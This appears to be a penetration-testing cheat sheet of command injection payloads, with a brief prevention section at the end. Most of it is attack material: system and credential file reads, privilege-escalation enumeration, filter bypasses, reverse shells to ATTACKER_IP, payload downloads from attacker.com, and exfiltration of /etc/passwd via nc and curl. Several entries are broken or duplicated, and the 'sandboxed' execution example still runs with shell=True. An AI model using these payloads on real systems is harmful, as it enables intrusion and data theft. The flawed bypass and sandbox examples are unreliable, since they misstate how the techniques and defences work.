Shell

Command Injection Payloads Comprehensive collection of command injection payloads and bypass techniques for penetration testing. Basic Command Injection Simple Commands # Basic command execution ; ls | ls & ls && ls || ls # Command chaining ; ls; whoami | ls | cat & ls & whoami && ls && whoami || ls || whoami Information Gathering # System information ; uname -a ; whoami ; id ; pwd ; ls -la ; cat /etc/passwd ; cat /etc/hosts ; cat /proc/version ; cat /proc/cpuinfo ; cat /proc/meminfo Network Information # Network interfaces ; ifconfig ; ip addr ; ip route ; netstat -an ; ss -tuln ; arp -a ; route -n Process Information # Running processes ; ps aux ; ps -ef ; top ; htop ; pstree ; lsof ; fuser Advanced Command Injection File Operations # File reading ; cat /etc/passwd ; head /etc/passwd ; tail /etc/passwd ; more /etc/passwd ; less /etc/passwd ; grep root /etc/passwd ; awk '{print $1}' /etc/passwd ; sed -n '1,10p' /etc/passwd Directory Traversal # Directory listing ; ls -la / ; ls -la /home ; ls -la /var ; ls -la /tmp ; find / -name "*.txt" 2>/dev/null ; find / -name "*.log" 2>/dev/null ; find / -name "*.conf" 2>/dev/null User Enumeration # User information ; cat /etc/passwd ; cut -d: -f1 /etc/passwd ; awk -F: '{print $1}' /etc/passwd ; getent passwd ; id ; whoami ; groups ; last ; w ; who Privilege Escalation # SUID files ; find / -perm -4000 2>/dev/null ; find / -perm -u+s 2>/dev/null ; find / -perm -2000 2>/dev/null ; find / -perm -g+s 2>/dev/null # Sudo capabilities ; sudo -l ; sudo -V ; cat /etc/sudoers ; grep -v '^#' /etc/sudoers Bypass Techniques Character Filtering Bypass # Space bypass ; cat${IFS}/etc/passwd ; cat$IFS/etc/passwd ; cat<tab>/etc/passwd ; cat<newline>/etc/passwd ; cat<carriage_return>/etc/passwd ; cat<form_feed>/etc/passwd ; cat<vertical_tab>/etc/passwd # Quote bypass ; cat /etc/passwd ; cat "/etc/passwd" ; cat '/etc/passwd' ; cat `/etc/passwd` Command Filtering Bypass # Case variation ; Ls ; LS ; lS ; Ls -La ; Ls -LA # Encoding bypass ; echo "cat /etc/passwd" | base64 | base64 -d | sh ; echo "cat /etc/passwd" | base64 | base64 -d | bash ; echo "cat /etc/passwd" | base64 | base64 -d | /bin/sh WAF Bypass # Comment bypass ; cat /etc/passwd # ; cat /etc/passwd /* ; cat /etc/passwd */ ; cat /etc/passwd <!-- # Encoding bypass ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd ; cat /etc/passwd Platform-specific Payloads Windows # Basic commands ; dir ; type C:\Windows\System32\drivers\etc\hosts ; whoami ; systeminfo ; ipconfig ; netstat -an ; tasklist ; wmic process list ; wmic service list ; reg query HKLM\SOFTWARE Linux/Unix # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; ss -tuln ; ifconfig ; ip addr ; route -n macOS # Basic commands ; ls ; cat /etc/passwd ; whoami ; uname -a ; ps aux ; netstat -an ; lsof -i ; ifconfig ; route -n ; system_profiler Advanced Techniques Reverse Shell # Netcat reverse shell ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT ; nc -e /bin/sh ATTACKER_IP PORT ; nc -e /bin/bash ATTACKER_IP PORT # Bash reverse shell ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 # Python reverse shell ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' File Upload # Download file ; wget http://attacker.com/shell.php ; curl -O http://attacker.com/shell.php ; nc -l -p 1234 > shell.php ; python -c "import urllib; urllib.urlretrieve('http://attacker.com/shell.php', 'shell.php')" Data Exfiltration # Send data to attacker ; cat /etc/passwd | nc ATTACKER_IP PORT ; cat /etc/passwd | curl -X POST -d @- http://attacker.com/collect ; cat /etc/passwd | base64 | nc ATTACKER_IP PORT ; tar -czf - /etc/passwd | nc ATTACKER_IP PORT Testing Tools Commix # Basic scan python3 commix.py -u "http://target.com/page.php?cmd=test" # With POST data python3 commix.py -u "http://target.com/page.php" --data="cmd=test" # With cookies python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123" # OS shell python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell Custom Script import requests import re def test_command_injection(url, param, payload): data = {param: payload} response = requests.post(url, data=data) # Check for command injection indicators indicators = [ "root:", "bin/bash", "bin/sh", "uid=", "gid=", "groups=", "total", "drwx", "-rw-", "Directory of", "Volume in drive" ] for indicator in indicators: if indicator in response.text: print(f"Command injection detected: {payload}") break # Test payloads payloads = [ "; ls", "| ls", "& ls", "&& ls", "|| ls", "; whoami", "| whoami", "& whoami", "&& whoami", "|| whoami" ] for payload in payloads: test_command_injection("http://target.com/command.php", "cmd", payload) Prevention and Mitigation Input Validation import re import shlex def validate_command(input_str): # Whitelist allowed characters allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.') if not set(input_str).issubset(allowed_chars): return False # Check for dangerous characters dangerous_chars = [';', '|', '&', '&&', '||', '`', '$', '(', ')', '<', '>', '\\', '"', "'"] for char in dangerous_chars: if char in input_str: return False return True Command Execution import subprocess import shlex def safe_command_execution(command): # Validate input if not validate_command(command): raise ValueError("Invalid command") # Use shlex to safely parse command args = shlex.split(command) # Execute command safely result = subprocess.run(args, capture_output=True, text=True, timeout=30) return result.stdout, result.stderr Sandboxing import subprocess import os import tempfile def sandboxed_execution(command): # Create temporary directory with tempfile.TemporaryDirectory() as temp_dir: # Change to temporary directory os.chdir(temp_dir) # Execute command in sandbox result = subprocess.run( command, shell=True, capture_output=True, text=True, timeout=30, cwd=temp_dir ) return result.stdout, result.stderr Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different command separators Test with different quote types Test with different encoding methods Test with different bypass techniques Test with different WAF bypasses Test with different platform-specific commands Test with different privilege escalation techniques